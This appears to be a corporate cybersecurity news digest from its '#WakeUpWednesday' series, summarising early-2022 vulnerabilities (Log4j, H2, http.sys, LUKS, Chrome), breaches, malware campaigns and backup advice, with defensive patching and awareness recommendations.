Logging is important, for example, to find out how cyber criminals got in. Nevertheless, Cisco research shows that due to a lack of logging, the attack vector is unknown in most incidents. Where the attack vector is known, in most cases the cause appears to be phishing, or applications that are accessible via the internet. Train the cyber awareness of your employees and ensure that vulnerabilities in the software are fixed as soon as an update is available.

In the #WakeUpWednesday we regularly report incidents where there is a need and urgency around patching. Incidents are also regularly discussed where increasing awareness can help increase cyber security.

Over the past week, Apache Foundation, which includes management of Apache Log4j, OpenOffice and Apache web server, warned against the use of end-of-life software. As a result, users are still being attacked through old vulnerabilities in Apache software that is no longer supported and/or maintained.

Updates have also been released for the LUKS encryption software for Linux. Making backups and making sure that they cannot be changed afterwards is one of the basic measures within cybersecurity. The LUKS encryption software contained a critical vulnerability (CVE-2021-4122) that allowed decryption without entering the passphrase.

Due to the combination of a weak administrator password and the use of a weak encryption algorithm, private data of nearly 7 million end users of the Open Subtitles website has been stolen and made public. The email addresses have been added to the data leak search engine Have I Been Pwned.

The Log4j vulnerability has an impact on many systems. For example, the British health service warns against abuse of the vulnerability in VMware Horizon. The software uses Apache Tomcat which in turn uses Log4j. Despite the fact that VMware patches were released in December, attackers are actively looking for systems that are not yet equipped with the available patches.

A new vulnerability has been discovered affecting H2 database consoles. This vulnerability also exploits the remote loading of JNDI classes, the same source of the Log4Shell vulnerability. Because this H2 database engine is also widely used, just like with Log4j, the reach is large. The vulnerability (CVE-2021-42392) affects H2 database versions 1.1.100 to 2.0.204. The advice is to update to version 2.0.206 as soon as possible.

During the January patch Tuesday, Microsoft released patches for 96 new vulnerabilities. The most severe vulnerability is a remote code execution vulnerability in http.sys, registered as CVE-2022-21907. This vulnerability allows an unauthenticated attacker to execute code on an affected system by sending a specially crafted request or response. We advise to check if your products are listed and apply the required patches or workaround as soon as possible.

It is no surprise that cybercriminals are always looking for new methods to penetrate organizations. Nowadays, for example, USB sticks are sent that are very similar in terms of stick and packaging to those of reputable organizations. However, the USB sticks sent contain malware in order to start malicious actions.

The makers of Flubot malware, an Android trojan that targets financial data, have launched a number of new campaigns to spread their malware. Be alert for messages related to, for example: updating Adobe flash player, false notifications for software updates that go outside the playstore, messages about package deliveries, etc. Most characteristic is that these messages contain a link that cannot be traced back to the organization in question.

2022 is off to a good start, also in the field of cybersecurity. Google has released a security update for Chrome. Among other things, this new update resolves a critical vulnerability that could allow an attacker to execute arbitrary code on a user’s system without requiring further user action. Executing code naturally enables an attacker to install malware on your computer that can, for example, be used to steal credit card and login details.

Cyber ​​criminals have carried out a supply chain attack on more than 100 companies by adding skimmer code to a video player of a cloud video hosting service. When an organization used the video player on, for example, a website, the malicious code was also added. As a result, the site was infected and credit card data could be stolen.

Cyber ​​security has many aspects. One of the basic measures is to create and restore backups. Determining a backup strategy is therefore part of a business continuity plan. Therefore, make sure that you know how long your organization (part) may be unavailable (Recovery Time Objective) and how much data loss is acceptable (Recovery Point Objective). Test this process regularly to avoid unpleasant surprises. For example, in December Kyoto University lost 77TB of research data due to an error in its backup system.